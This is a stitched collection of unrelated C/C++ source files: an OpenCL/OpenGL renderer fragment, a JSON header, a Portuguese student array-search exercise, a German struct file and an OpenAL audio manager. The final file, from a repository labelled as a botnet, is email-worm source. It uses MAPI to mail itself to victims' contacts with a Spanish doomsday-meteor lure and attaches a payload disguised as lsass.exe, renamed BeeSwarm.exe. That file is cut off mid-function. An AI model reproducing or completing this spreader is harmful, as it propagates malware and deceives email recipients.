cmDevDst = clCreateBuffer( m_cl.m_context, CL_MEM_WRITE_ONLY, sizeof( cl_float)*szGlobalWorkSize, NULL, &ciErrNum );
if( ciErrNum != CL_SUCCESS )
{
cerr<<"create buffer failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
return;
}
// Create the kernel
ckKernel = clCreateKernel( cpProgram, "VectorAdd", &ciErrNum );
if( ciErrNum != CL_SUCCESS )
{
cerr<<"Create kernel failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
return;
}
ciErrNum = clSetKernelArg( ckKernel, 0, sizeof(cl_mem), (void*)&cmDevSrcA );
ciErrNum |= clSetKernelArg( ckKernel, 1, sizeof(cl_mem), (void*)&cmDevSrcB );
ciErrNum |= clSetKernelArg( ckKernel, 2, sizeof(cl_mem), (void*)&cmDevDst );
ciErrNum |= clSetKernelArg( ckKernel, 3, sizeof(cl_int), (void*)&iNumElements );
if( ciErrNum != CL_SUCCESS )
{
cerr<<"Set kernel arguments failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
return;
}
// Alocate buffer for host side
void* srcA = (void*)malloc( sizeof(cl_float)*szGlobalWorkSize );
void* srcB = (void*)malloc( sizeof(cl_float)*szGlobalWorkSize );
void* dst = (void*)malloc( sizeof(cl_float)*szGlobalWorkSize );
void*Golden = (void*)malloc( sizeof(cl_float)*iNumElements );
shrFillArray( (float*)srcA, iNumElements );
shrFillArray( (float*)srcB, iNumElements );
// For buffers we need to write data to GPU explicitly because we don't specify CL_MEM_COPY_HOST_PTR when we create buffer
// Note that only buffer need to do this
ciErrNum = clEnqueueWriteBuffer( m_cl.m_queue,
cmDevSrcA,
CL_FALSE,
0,
sizeof(cl_float)*szGlobalWorkSize,
srcA,
0,
NULL,
NULL
);
ciErrNum |= clEnqueueWriteBuffer( m_cl.m_queue,
cmDevSrcB,
CL_FALSE,
0,
sizeof(cl_float)*szGlobalWorkSize,
srcB,
0,
NULL,
NULL
);
if( ciErrNum != CL_SUCCESS )
{
cerr<<"Write buffer failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
return;
}
// Launch kernel
ciErrNum = clEnqueueNDRangeKernel( m_cl.m_queue, ckKernel,1,NULL,&szGlobalWorkSize, &szLocalWorkSize, 0, NULL, NULL );
if( ciErrNum != CL_SUCCESS )
{
cerr<<"Launch kernel failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
return;
}
// Synchronize/ blocking read buffer
ciErrNum = clEnqueueReadBuffer( m_cl.m_queue, cmDevDst, CL_TRUE, 0, sizeof( cl_float )*szGlobalWorkSize, dst, 0, NULL, NULL );
if( ciErrNum != CL_SUCCESS )
{
cerr<<"Read buffer failed in line:"<<__LINE__<<", File:"<<__FILE__<<endl;
return;
}
// Vector add host
int i = 0;
for( i = 0; i < iNumElements; i++ )
{
*( (float*)Golden + i) = *((float*)srcA + i) + *((float*) srcB + i);
}
shrBOOL bMatch = shrComparefet( (const float*) Golden, (const float*)dst, (unsigned int )iNumElements, 0.f, 0 );
if( bMatch == shrTRUE )
{
cout<<"Test passed, the result of vector add is correct"<<endl;
}
else
{
cout<<"Test failed, the result of vector add is not same"<<endl;
}
// Free resources
free( srcA );
free(srcB );
free( dst );
free( Golden );
if( cSourceCL )
free( cSourceCL );
if( ckKernel )
clReleaseKernel( ckKernel );
if( cpProgram )
clReleaseProgram( cpProgram );
if( cmDevSrcA )
clReleaseMemObject( cmDevSrcA );
if( cmDevSrcB )
clReleaseMemObject( cmDevSrcB );
if( cmDevDst )
clReleaseMemObject( cmDevDst );
}
void View3D::initBuffer()
{
createPBO( &m_pbo, WIN_WIDTH, WIN_HEIGHT );
}
void View3D::createPBO( GLuint* pbo, const int imageWidth, const int imageHeight )
{
// set up data parameter
int numTexels = imageWidth * imageHeight;
int numValues = numTexels * 4;
int sizeTexData = sizeof(GLubyte) * numValues;
glGenBuffers(1, pbo);
glBindBuffer(GL_ARRAY_BUFFER, *pbo);
glBufferData(GL_ARRAY_BUFFER, sizeTexData, NULL, GL_DYNAMIC_DRAW);
glBindBuffer(GL_ARRAY_BUFFER, 0);
}
void View3D::deletePBO(GLuint* pbo )
{
if( *pbo != 0 )
{
glDeleteBuffers( 1, pbo );
}
}
void View3D::GPUrender()
{
if( !m_supportGPU )
{
cerr<<"GPU render is not supported"<<endl;
return;
}
if( !m_cl.m_kernelRay )
{
cerr<<"Kernel has not been set up"<<endl;
return;
}
if( m_gpuscene && m_gpuActivated )
m_gpuscene->render();
}
void View3D::genFontDisplayList()
{
float cx, cy; /* the character coordinates in our texture */
m_fontBase = glGenLists(256);
glBindTexture(GL_TEXTURE_2D, m_fontHandle );
for ( int loop = 0; loop < 256; loop++)
{
cx = (float) (loop % 16) / 16.0f;
cy = (float) (loop / 16) / 16.0f;
glNewList(m_fontBase + loop, GL_COMPILE);
//glScalef(0.8, 0.8, 0.8 );
glBegin(GL_QUADS);
glTexCoord2f(cx, 1 - cy - 0.0625f);
glVertex2i(0, 0);
glTexCoord2f(cx + 0.0625f, 1 - cy - 0.0625f);
glVertex2i(16, 0);
glTexCoord2f(cx + 0.0625f, 1 - cy);
glVertex2i(16, 16);
glTexCoord2f(cx, 1 - cy);
glVertex2i(0, 16);
glEnd();
// glScalef( 1.25, 1.25, 1.25 );
glTranslated(10, 0, 0);
glEndList();
}
}
void View3D::killFont()
{
glDeleteLists( m_fontBase, 256 );
}
void View3D::printText( int x, int y, const char* string, int set )
{
glDisable(GL_LIGHTING);
glBindTexture(GL_TEXTURE_2D, m_fontHandle);
glDisable(GL_DEPTH_TEST);
glMatrixMode(GL_PROJECTION);
glPushMatrix();
// Reset the matrix, becase we push the matrix beforehand, it won't affect other objects after it's popped
glLoadIdentity();
glOrtho(0, WIN_WIDTH, 0, WIN_HEIGHT, -1, 1);
glMatrixMode(GL_MODELVIEW);
glPushMatrix();
// Reset the matrix, becase we push the matrix beforehand, it won't affect other objects after it's popped
glLoadIdentity();
glTranslated(x, y, 0);
glListBase(m_fontBase - 32 + (128 * set));
glCallLists( strlen(string), GL_BYTE, string);
glMatrixMode(GL_PROJECTION);
glPopMatrix();
glMatrixMode(GL_MODELVIEW);
glPopMatrix();
glBindTexture(GL_TEXTURE_2D, 0);
glEnable(GL_DEPTH_TEST);
glEnable(GL_LIGHTING);
}
/**
tick() will be called each frame
**/
void View3D::tick()
{
updateTime();
update();
}
|
05e0e86a8fda49b573fc13599f818660376d29ca | bba067eefdac16bf983636733217f3fe36a16847 | /Engine/Persistence/json.hpp | 27864545d371da74d1d2a1106c0198b5d0cc325a | [] | no_license | tankiJong/morph-engine | aa77c50bd867ff64742260a0611d3d84f2b6bbe8 | 64f37418cadc5945d246bdc488002df62aa0f0bc | refs/heads/master | 2021-03-27T13:57:39.963493 | 2018-12-07T23:19:22 | 2018-12-07T23:19:22 | 103,325,220 | 20 | 3 | null | null | null | null | UTF-8 | C++ | false | false | 231 | hpp | json.hpp | #pragma once
#include "Engine/Core/common.hpp"
#define JSON_HAS_CPP_17
#pragma warning( push )
#pragma warning( disable : 4348 )
#include "ThirdParty/nlohmann-json/json.hpp"
#pragma warning( pop )
using json = nlohmann::json; |
2d0f0a4068003b7c136b179434299283da2f6f46 | d10c69dd01b2aaa5359403dd6d65565a7fd2c926 | /IFAM - TADS - ATP - Vetor - Exercício2.cpp | 042ccb55b3a42e317773234609582ed687b46839 | [] | no_license | maisonsouza/IFAM-ATP-2018 | 0f6e068cccbe4838f03f8964cb25e22c5ab7689c | a6d85b0c19b516410f48e062690b57a803f911c9 | refs/heads/master | 2020-03-16T19:42:30.139035 | 2018-05-24T15:21:00 | 2018-05-24T15:21:00 | 132,928,445 | 0 | 0 | null | null | null | null | ISO-8859-1 | C++ | false | false | 1,615 | cpp | IFAM - TADS - ATP - Vetor - Exercício2.cpp | #include <stdio.h>
#include <locale.h>
#include <stdlib.h>
#include <time.h>
#include <conio.h>
main(){
setlocale(LC_ALL,"");
srand(time(NULL));
int numero, numeros[10],indice,passos=0;
bool achou=false;
printf("\n-----------------------------------------------------------------------------------------------------\n");
printf("2 - Faça um algoritmo para preencher um vetor de tamanho 10 com valores aleatórios. Solicite que o usuário\n digite um número e pesquise se este número no vetor. Como resultado, informe se encontrou ou não e quantos passos foram utilizados para procurar o elemento no vetor.");
printf("\n-----------------------------------------------------------------------------------------------------\n");
for(indice=0;indice<10;indice++){
numeros[indice]=rand()%10;
}
printf("Digite um número para pesquisar no vetor\n");
scanf("%d",&numero);
for(indice=0;indice<10;indice++){
if(numeros[indice]==numero){
passos=indice+1;
achou=true;
}
}
if(achou==false){
printf("Esse número não foi encontrado no vetor\n");
passos=9;
}else{
printf("Encontramos o número no vetor\n",indice+1);
}
printf("\nForam utilizados %d passos\n",passos);
printf("\n---------------------------------------------------------------------------------------------------------------\n");
printf("VETOR GERADO COM NÚMEROS ALEATÓRIOS");
printf("\n---------------------------------------------------------------------------------------------------------------\n");
for(indice=0;indice<10;indice++){
printf(" [%d] = %d |",indice+1,numeros[indice]);
}
getch();
}
|
89b4bc886bb28cda9dd5e47ef06e4c2207448cba | d708a0b61e31a724bcabfe20ac12e0ab352e4ea6 | /Treffsicherheit/structs.h | 8148a50de9293d03defc234b01128e0285815a4a | [] | no_license | LazyYuki/Bwinf-40 | 61767c0701b47db8611f9d604f27cfa12960c048 | dda7c1d4d9e982cfeed15c196cc0d0864bcbf99d | refs/heads/master | 2023-09-05T15:27:57.509635 | 2021-11-23T16:24:28 | 2021-11-23T16:24:28 | 404,769,284 | 3 | 0 | null | null | null | null | ISO-8859-1 | C++ | false | false | 656 | h | structs.h | #include "include.h"
struct Member
{
int beliebtestes{2};
std::vector<int> Tage{};
void BeliebtesterTag()
{
for (int Tag : Tage)
{
if (Tag < beliebtestes) beliebtestes = Tag;
if (beliebtestes == 0) break; //beliebtestes ist max
}
}
int VeränderteTage(int index) //Wie viele Tage verändert werden müssen um es beliebt zu machen
{
int output{0};
int TagBeliebtheit = this->Tage[index];
for (int i = 0; i < this->Tage.size(); i++)
{
if (i == index) continue;
else if (TagBeliebtheit > this->Tage[i]) output++;
}
return output;
}
};
struct Tag
{
int index{};
int beliebtheit{};
int veränderteEinträge{0};
}; |
cc414d5d41e321773ef9a5b1319c19ba4767bc1d | 291c6db9c4aca46a8bb41f19e9df452ca2eb3043 | /Core/AudioManager.cpp | fa98b57b06f7c43e3327361344f238ab8264a7b6 | [] | no_license | KFlaga/FlagRTS | 39a41647a535340adde9baf9d43b97c6f366bcca | b12e799d307b5afac4c9643b4d35b9d3750057c5 | refs/heads/master | 2021-01-20T20:28:19.255040 | 2016-07-03T11:57:54 | 2016-07-03T11:57:54 | 62,491,690 | 1 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 18,106 | cpp | AudioManager.cpp | #include "AudioManager.h"
#include "SoundFactory.h"
#include "SoundListener.h"
#include "Sound.h"
#include "SoundSource.h"
#include "Exception.h"
#include "ConfigurationManager.h"
#include "ErrorManager.h"
#include "LogManager.h"
#include <OgreSceneNode.h>
#include "SoundChannel.h"
#include "StringUtils.h"
#include "SystemSettings.h"
#include "AudioSettings.h"
namespace FlagRTS
{
using namespace Media;
AudioManager* AudioManager::_instance = 0;
AudioManager::AudioManager() :
_soundFactory(xNew0(SoundFactory)),
_playerFactory(xNew0(SoundPlayerFactory)),
_soundListener(xNew0(SoundListener)),
_onSoundFinished(this),
_onMusicFinished(this),
_listenerNode(0)
{
}
AudioManager::~AudioManager()
{
ADD_LOG("Releasing OgreAL");
ClearMusicQueue();
xDelete(_backgroundMusicSource);
// Stop and release all alsources
for(unsigned int i = 0; i < _allALSources.size(); ++i)
{
alSourceStop(_allALSources[i]);
alSourcei(_allALSources[i], AL_BUFFER, 0);
alDeleteSources(1, &_allALSources[i]);
}
UnloadAllSounds();
// First players, then sounds should be deleted
for(auto packIt = _soundPlayers.begin(); packIt != _soundPlayers.end(); ++packIt)
{
for(auto it = packIt->Value->begin(); it != packIt->Value->end(); ++it)
{
xDelete( it->Value );
}
xDelete( packIt->Value );
}
_soundPlayers.clear();
_loadedSounds.clear();
for(auto packIt = _availableSounds.begin(); packIt != _availableSounds.end(); ++packIt)
{
for(auto it = packIt->Value->begin(); it != packIt->Value->end(); ++it)
{
xDelete( it->Value );
}
xDelete( packIt->Value );
}
_availableSounds.clear();
for(auto chIt = _channels.begin(); chIt != _channels.end(); ++chIt)
{
xDelete( *chIt );
}
_channels.clear();
ALCcontext *context = alcGetCurrentContext();
ALCdevice *device = alcGetContextsDevice(context);
alcMakeContextCurrent(NULL);
alcDestroyContext(context);
alcCloseDevice(device);
xDelete(_soundFactory);
xDelete(_playerFactory);
xDelete(_soundListener);
}
ErrorCode AudioManager::InitSoundManager()
{
ADD_LOG("Initializing AudioManager");
ADD_LOG("Creating OpenAL");
auto availableDevices = alcGetString(NULL, ALC_DEVICE_SPECIFIER);
ALCdevice* device = alcOpenDevice(NULL); // Open default device -> later may make it changable in options and read from config
ADD_LOG("Creating device: " + string(alcGetString(device, ALC_DEVICE_SPECIFIER)));
if(device == NULL)
{
CastException((string("Failed to open audio device") + alcGetString(device, ALC_DEVICE_SPECIFIER)).c_str());
}
ALCcontext* context = alcCreateContext(device, NULL);
if(context == NULL)
{
CastException("Failed to create OpenAL Context");
}
alcMakeContextCurrent(context);
alDistanceModel(AL_LINEAR_DISTANCE_CLAMPED);
// Check for Supported Formats
ALenum alFormat = 0;
alFormat = alcGetEnumValue(device, "AL_FORMAT_MONO16");
if(alFormat)
_availableFormats.insert(alFormat, SoundFormat(alFormat, SoundFormatChannels::Mono, "Mono Sound"));
alFormat = alcGetEnumValue(device, "AL_FORMAT_STEREO16");
if(alFormat)
_availableFormats.insert(alFormat, SoundFormat(alFormat, SoundFormatChannels::Stereo, "Stereo Sound"));
alFormat = alcGetEnumValue(device, "AL_FORMAT_QUAD16");
if(alFormat)
_availableFormats.insert(alFormat, SoundFormat(alFormat, SoundFormatChannels::Quad, "4-CH Sound"));
alFormat = alcGetEnumValue(device, "AL_FORMAT_51CHN16");
if(alFormat)
_availableFormats.insert(alFormat, SoundFormat(alFormat, SoundFormatChannels::Multi_51, "5.1 Surround Sound"));
alFormat = alcGetEnumValue(device, "AL_FORMAT_61CHN16");
if(alFormat)
_availableFormats.insert(alFormat, SoundFormat(alFormat, SoundFormatChannels::Multi_61, "6.1 Surround Sound"));
alFormat = alcGetEnumValue(device, "AL_FORMAT_71CHN16");
if(alFormat)
_availableFormats.insert(alFormat, SoundFormat(alFormat, SoundFormatChannels::Multi_71, "7.1 Surround Sound"));
// Check for EAX Support
/*std::stringbuf versionString;
for(int version = 5; version >= 2; version--)
{
versionString.str("EAX" + std::to_string(version) + ".0");
if(alIsExtensionPresent(versionString.str().data()) == AL_TRUE)
{
_eaxSupport = true;
_eaxVersion = version;
break;
}
}*/
//// Check for X-RAM extension
//if(alIsExtensionPresent("EAX-RAM") == AL_TRUE)
//{
// mXRAMSupport = true;
// Ogre::LogManager::getSingleton().logMessage("X-RAM Detected");
// EAXSetBufferMode setXRamMode = (EAXSetBufferMode)alGetProcAddress("EAXSetBufferMode");
// EAXGetBufferMode getXRamMode = (EAXGetBufferMode)alGetProcAddress("EAXGetBufferMode");
// mXRamSize = alGetEnumValue("AL_EAX_RAM_SIZE");
// mXRamFree = alGetEnumValue("AL_EAX_RAM_FREE");
//
// Ogre::LogManager::getSingleton().logMessage("X-RAM: " + Ogre::StringConverter::toString(mXRamSize) +
// " (" + Ogre::StringConverter::toString(mXRamFree) + " free)");
//}
alGetError();
int sourcesCount = 0;
// Create as many sources as possible ( up to 31 )
while( alGetError() == AL_NO_ERROR
&& sourcesCount < 31 )
{
SourceId source;
alGenSources(1, &source);
_allALSources.push_back(source);
_freeALSources.push_back(source);
++sourcesCount;
}
if(sourcesCount == 0) // Somthing went bad
{
CastException("Couldnt generate any OpenAL source!");
}
// Create source for music
_backgroundMusicSource = xNew0(SoundSource);
_backgroundMusicSource->SetALSource(_allALSources.back());
_backgroundMusicSource->GetOnFinsihedEvent() += &_onMusicFinished;
_freeALSources.pop_back();
_currentMusic = 0;
_soundListener->SetGain(0.6f);
// Create standard channels ( just next CH_StdChannelsCount )
for(int i = 0; i < SoundChannel::CH_StdChannelsCount; ++i)
{
CreateChannel();
}
UpdateSettings();
return ErrorCodes::Success;
}
void AudioManager::AddSoundDoc(const string& dir)
{
RefPtr<XmlDocument> soundDoc = XmlUtility::XmlDocFromFile((dir+"Sounds.xml").c_str());
// Get first sound pack and check if any pack exists
XmlNode* rootNode = soundDoc->first_node("SoundPackList");
XmlNode* spackNode = rootNode->first_node("SoundPack", 9);
if(spackNode != 0)
{
bool lastPackParsed = false; // true if all sounds packs are parsed
do
{
// Check if its last loop
if(spackNode == rootNode->last_node("SoundPack", 9))
lastPackParsed = true;
// Check if pack exists in map ( pack can be split into many nodes ) and find it
char* packName = spackNode->first_attribute("Name", 4, false)->value();
char* nameCopy = CopyChar(packName);
if(_availableSounds.find(packName) == _availableSounds.end() )
{
// No such pack in map, so add new one
_availableSounds.insert(nameCopy, (xNew0(SoundPack)));
_soundPlayers.insert(nameCopy, xNew0(HashedMaps<ISoundPlayer*>::KeyCCString));
}
SoundPack* soundPack = _availableSounds.find(packName)->Value;
ParseSoundPackNode(spackNode, soundPack, dir);
// Get next sound pack node
spackNode = spackNode->next_sibling("SoundPack", 9);
}
while(!lastPackParsed);
}
}
void AudioManager::ParseSoundPackNode(XmlNode* spackNode, SoundPack* soundPack, const string& packDir)
{
// Parse all sounds in pack
XmlNode* soundNode = spackNode->first_node("Sound", 5);
if(soundNode != 0)
{
bool lastSoundParsed = false;
do
{
// Check if its last loop
if(soundNode == spackNode->last_node("Sound", 5))
lastSoundParsed = true;
Sound* sound = _soundFactory->CreateCast(soundNode);
if(sound != 0)
{
// add directory to sound file path
sound->SetFile( packDir + sound->GetFile());
soundPack->insert(sound->GetName().c_str(), sound);
ISoundPlayer* player = _playerFactory->CreateCast(soundNode);
if(player != 0)
{
player->SetSound(sound);
_soundPlayers[sound->GetPack().c_str()]->insert(sound->GetName().c_str(), player);
}
}
// Get next sound from pack
soundNode = soundNode->next_sibling("Sound", 5);
}
while(!lastSoundParsed);
}
}
ErrorCode AudioManager::LoadSoundPack(const char* packName)
{
if(_loadedSounds.find(packName) != _loadedSounds.end() )
return RETURN_ERROR(ErrorCodes::AudioPackAlreadyLoaded);
if(_availableSounds.find(packName) == _availableSounds.end() )
return RETURN_ERROR(ErrorCodes::AudioPackNotFound);
SoundPack* pack = _availableSounds.find(packName)->Value;
_loadedSounds[packName] = pack;
for(auto sit = pack->begin(); sit != pack->end(); sit++)
{
sit->Value->LoadSound();
}
return ErrorCodes::Success;
}
ErrorCode AudioManager::UnloadSoundPack(const char* packName)
{
if(_loadedSounds.find(packName) != _loadedSounds.end())
return RETURN_ERROR(ErrorCodes::AudioPackNotLoaded);
RefPtr<SoundPack> pack = _loadedSounds.find(packName)->Value;
_loadedSounds.erase(packName);
for(auto sit = pack->begin(); sit != pack->end(); sit++)
{
sit->Value->UnloadSound();
}
return ErrorCodes::Success;
}
ErrorCode AudioManager::UnloadAllSounds()
{
for(auto spit = _loadedSounds.begin(); spit != _loadedSounds.end(); spit++)
{
for(auto sit = spit->Value->begin(); sit != spit->Value->end(); sit++)
{
sit->Value->UnloadSound();
}
}
_loadedSounds.clear();
return ErrorCodes::Success;
}
Sound* AudioManager::FindSound(const char* soundName, const char* soundPack)
{
auto packIt = _availableSounds.find(soundPack);
if(packIt != _availableSounds.end())
{
auto soundIt = packIt->Value->find(soundName);
if(soundIt != packIt->Value->end())
{
return soundIt->Value;
}
}
return 0; // Pack/sound not found
}
void AudioManager::Update(float ms)
{
// Update listner
if( _listenerNode != 0)
{
auto& pos = _listenerNode->getPosition();
if( !_soundListener->GetPosition().positionEquals(pos, 0.1f) )
{
_soundListener->SetVelocity( (pos - _soundListener->GetPosition() ) / ms );
_soundListener->SetPosition(pos);
}
else
_soundListener->SetVelocity(Vector3(0.f,0.f,0.f));
auto& orient = _listenerNode->getOrientation();
Vector3 newDir = orient * Vector3(0.f,0.f,-1.f);
if( !newDir.directionEquals(_soundListener->GetDirection(), Radian(Degree(1.f))) )
{
_soundListener->SetDirection(newDir);
}
Vector3 newUp = orient * Vector3(0.f,1.f,0.f);
if( !newUp.directionEquals(_soundListener->GetDirection(), Radian(Degree(1.f))) )
{
_soundListener->SetUp(newUp);
}
}
_soundListener->Update(ms);
// Pause/stop/play sounds from queues
for(auto sit = _pauseQueue.begin(); sit != _pauseQueue.end(); ++sit)
{
PauseSoundInt( *sit );
}
_pauseQueue.clear();
for(auto sit = _stopQueue.begin(); sit != _stopQueue.end(); ++sit)
{
StopSoundInt( *sit );
}
_stopQueue.clear();
for(auto sit = _playQueue.begin(); sit != _playQueue.end(); ++sit)
{
StartSoundInt( *sit );
}
_playQueue.clear();
// Update all sources
for(auto sourceIt = _usedSources.begin(); sourceIt != _usedSources.end(); ++sourceIt)
{
sourceIt->Value->Update(ms);
}
}
void AudioManager::AttachToScene(Ogre::SceneNode* snode)
{
_listenerNode = snode;
_soundListener->SetPosition(snode->getPosition());
auto& orient = snode->getOrientation();
_soundListener->SetDirection(orient*Vector3(0.f,0.f,-1.f));
_soundListener->SetUp(orient*Vector3(0.f,1.f,0.f));
_soundListener->SetVelocity(Vector3(0.f,0.f,0.f));
}
SoundSource* AudioManager::CreateSoundSource(Sound* sound)
{
SoundSource* ssource = xNew0(SoundSource);
if(sound->GetCurrentState() == Unloaded)
{
sound->LoadSound();
}
ssource->SetSound( sound );
return ssource;
}
SoundSource* AudioManager::CreateSoundSource(const char* soundName, const char* soundPack)
{
SoundSource* ssource = xNew0(SoundSource);
Sound* sound = FindSound(soundName, soundPack);
if(sound->GetCurrentState() == Unloaded)
{
sound->LoadSound();
}
ssource->SetSound(sound);
return ssource;
}
void AudioManager::DestroySoundSource(SoundSource* ssource)
{
if(ssource->GetCurrentState() != Unloaded)
{
StopSoundInt(ssource);
ssource->SetSound(0);
}
xDelete(ssource);
}
ISoundPlayer* AudioManager::GetSoundPlayer(const char* soundName, const char* soundPack)
{
auto packIt = _soundPlayers.find(soundPack);
if(packIt != _soundPlayers.end())
{
auto soundIt = packIt->Value->find(soundName);
if(soundIt != packIt->Value->end())
{
return soundIt->Value;
}
}
return 0; // Pack/sound not found
}
void AudioManager::PlaySoundSource(SoundSource* soundSource)
{
_playQueue.push_back(soundSource);
}
void AudioManager::StopSoundSource(SoundSource* soundSource)
{
_stopQueue.push_back(soundSource);
}
void AudioManager::PauseSoundSource(SoundSource* soundSource)
{
_pauseQueue.push_back(soundSource);
}
void AudioManager::StartSoundInt(SoundSource* ssource)
{
switch( ssource->GetCurrentState() )
{
case Playing:
// If already playing, play again
ssource->Rewind();
break;
case Paused:
// If was paused, resume
ssource->Start();
break;
case Stopped:
// If was stopped, but not unloaded ( so both source and sound are set )
ssource->Start();
break;
default: // Unloaded -> source should be set to 0, but not sound
_ASSERT( ssource->GetSound() != 0 );
if( ssource->GetSound() == 0 )
return;
_ASSERT( ssource->GetSound()->GetAlBuffer() != 0 );
if( ssource->GetSound()->GetAlBuffer() == 0 )
return;
// Check if there is free source
if( _freeALSources.size() == 0 )
{
// If last sound have lower priority ( it have lowest in list ) - end it
if( _usedSources.back()->GetPriority() <= ssource->GetPriority() )
{
auto toRemove = _usedSources.back();
_usedSources.pop_back();
_freeALSources.push_back(toRemove->GetAlSource());
toRemove->Stop();
toRemove->SetALSource(0);
}
}
ssource->SetALSource( _freeALSources.back() );
_freeALSources.pop_back();
ssource->Start();
// Push it to correct place at used list
auto sourceIt = _usedSources.begin();
for(; sourceIt != _usedSources.end(); ++sourceIt)
{
// Find first source with lower/same priority and place it before it
if( sourceIt->Value->GetPriority() <= ssource->GetPriority() )
{
if( sourceIt == _usedSources.begin() ) // New sound have highest prioirty in list -> push front
_usedSources.push_front( ssource );
else
_usedSources.insert( sourceIt, ssource );
break;
}
}
if( sourceIt == _usedSources.end() )
{
// list empty or only higher priorities -> push_back
_usedSources.push_back( ssource );
}
ssource->GetOnFinsihedEvent() += &_onSoundFinished;
}
}
void AudioManager::PauseSoundInt(SoundSource* ssource)
{
if( ssource->GetCurrentState() == Playing )
{
ssource->Pause();
}
}
void AudioManager::StopSoundInt(SoundSource* ssource)
{
ssource->GetOnFinsihedEvent() -= &_onSoundFinished;
if( ssource->GetAlSource() != 0 )
{
_usedSources.remove( ssource );
_freeALSources.push_back(ssource->GetAlSource());
ssource->Rewind();
ssource->Stop();
ssource->SetALSource(0);
}
}
void AudioManager::OnSoundFinished(SoundSource* ssource, bool finished)
{
if( finished )
{
StopSoundSource(ssource);
}
}
void AudioManager::OnMusicFinished(SoundSource* ssource, bool finished)
{
if( finished )
{
NextMusic();
}
}
void AudioManager::AddMusicToQueue(const char* soundName, const char* soundPack)
{
_musicQueue.push_back(FindSound(soundName, soundPack));
if( _musicQueue.size() == 1)
NextMusic();
}
void AudioManager::RemoveMusicFromQueue(const char* soundName, const char* soundPack)
{
Sound* sound = FindSound(soundName, soundPack);
if( sound == 0 )
return;
if( _backgroundMusicSource->GetSound() == sound)
{
if( _musicQueue.size() == 1 )
{
ClearMusicQueue();
return;
}
else
NextMusic();
}
for(unsigned int i = 1; i < _musicQueue.size(); ++i)
{
if( _musicQueue[i] == sound )
_musicQueue.removeAt(i);
}
}
void AudioManager::ClearMusicQueue()
{
_musicQueue.clear();
if( _backgroundMusicSource->GetCurrentState() != Unloaded )
{
_backgroundMusicSource->Stop();
}
_backgroundMusicSource->SetSound(0);
_backgroundMusicSource->SetALSource(0);
_currentMusic = 0;
}
void AudioManager::NextMusic()
{
if( _musicQueue.size() == 0 )
return;
++_currentMusic;
if( _currentMusic >= _musicQueue.size() )
_currentMusic = 0;
if( _backgroundMusicSource->GetCurrentState() == Playing )
_backgroundMusicSource->Stop();
_backgroundMusicSource->SetSound(_musicQueue[_currentMusic]);
PlaySoundSource(_backgroundMusicSource);
}
void AudioManager::SetMusicGain(float mgain)
{
_backgroundMusicSource->SetGain(mgain);
}
int AudioManager::CreateChannel()
{
SoundChannel* channel = xNew1(SoundChannel, _channels.size());
_channels.push_back( channel );
return channel->GetId();
}
SoundChannel* AudioManager::GetChannel(int id)
{
_ASSERT( id < (int)_channels.size() );
return _channels[id];
}
void AudioManager::UpdateSettings()
{
_soundListener->SetGain(SystemSettings::GetAudioSettings().MasterVolume);
_backgroundMusicSource->SetGain(SystemSettings::GetAudioSettings().MusicVolume);
SoundChannel* channel;
for(unsigned int i = 0; i <_channels.size(); ++i)
{
channel = _channels[i];
switch (channel->GetId())
{
case SoundChannel::CH_Gui:
channel->SetGain(SystemSettings::GetAudioSettings().GUIVolume);
break;
case SoundChannel::CH_Alerts:
channel->SetGain(SystemSettings::GetAudioSettings().AlertsVolume);
break;
case SoundChannel::CH_Dialog1:
case SoundChannel::CH_Dialog2:
channel->SetGain(SystemSettings::GetAudioSettings().VoiceVolume);
break;
case SoundChannel::CH_SelectionAcknowledge1:
case SoundChannel::CH_SelectionAcknowledge2:
channel->SetGain(SystemSettings::GetAudioSettings().ResponseVolume);
break;
default:
break;
}
}
}
} |
c946827b91803ff33aeb5c4935ce82f4693a6e53 | c739b3f04b5de3c840e855c6f5c956156ace64ad | /Botnets/ganja 3.1-iRooT BoT/email.cpp | d67fc54d47952bd4a8e546009007efbd0db46b3c | [] | no_license | ArchDex/blackhat-stuff | eedef9945c54497d77f3f90f343625fba90937c1 | 3ce651d914a50c73170ff716f71b94e7ad505fcd | refs/heads/master | 2020-12-07T11:31:00.148825 | 2020-01-10T18:25:44 | 2020-01-10T18:25:44 | 232,710,211 | 7 | 6 | null | null | null | null | ISO-8859-10 | C++ | false | false | 4,015 | cpp | email.cpp | #include "wALL.h"
#include "Defines.h"
#include <mapi.h>
int EmailSpread () {
// unsigned long __stdcall EmailSpam( void* ) {
HKEY RegHandle1;
HKEY RegHandle2;
char DefaultUserId[100];
DWORD DefaultUserIdSize = sizeof(DefaultUserId);
DWORD WarnDisable = 0;
HINSTANCE MapiDll;
LPMAPILOGON MapiLogon;
LPMAPIFINDNEXT MapiFindNext;
LPMAPIREADMAIL MapiReadMail;
LPMAPISENDMAIL MapiSendMail;
LPMAPILOGOFF MapiLogoff;
LHANDLE MapiSessionHandle;
MapiMessage *GetMessage;
MapiMessage Message;
MapiRecipDesc Originator;
MapiRecipDesc Recips;
MapiFileDesc Files;
char WormFile[MAX_PATH] = "%appdata%\\lsass.exe";
char Subject[100];
char VictimAddress[100];
char MessageBuffer[512];
char Re[] = "Re: ";
unsigned short MailCount = 15; //10
Message.ulReserved = 0;
Message.lpszSubject = Subject;
Message.lpszNoteText = "Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un aņo.informate en el siguiente enlace";
Message.lpszMessageType = 0;
Message.lpszDateReceived = 0;
Message.lpszConversationID = 0;
Message.flFlags = 0;
Message.lpOriginator = &Originator;
Message.nRecipCount = 1;
Message.lpRecips = &Recips;
Message.nFileCount = 1;
Message.lpFiles = &Files;
Originator.ulReserved = 0;
Originator.ulRecipClass = MAPI_ORIG;
Originator.lpszName = 0;
Originator.lpszAddress = 0;
Originator.ulEIDSize = 0;
Originator.lpEntryID = 0;
Recips.ulReserved = 0;
Recips.ulRecipClass = MAPI_TO;
Recips.lpszName = 0;
Recips.lpszAddress = VictimAddress;
Recips.ulEIDSize = 0;
Recips.lpEntryID = 0;
Files.ulReserved = 0;
Files.flFlags = 0;
Files.nPosition = 0;
Files.lpszPathName = WormFile;
Files.lpszFileName = "BeeSwarm.exe"; //szEXE;
Files.lpFileType = 0;
